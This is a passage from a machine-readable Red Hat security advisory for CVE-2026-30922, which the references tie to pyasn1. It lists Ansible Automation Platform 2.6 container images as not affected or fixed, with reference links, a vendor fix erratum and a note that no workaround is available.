"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "RHBZ#2448553",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448553"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-30922",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30922"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0",
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
}
],
"release_date": "2026-03-18T02:29:45.857000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
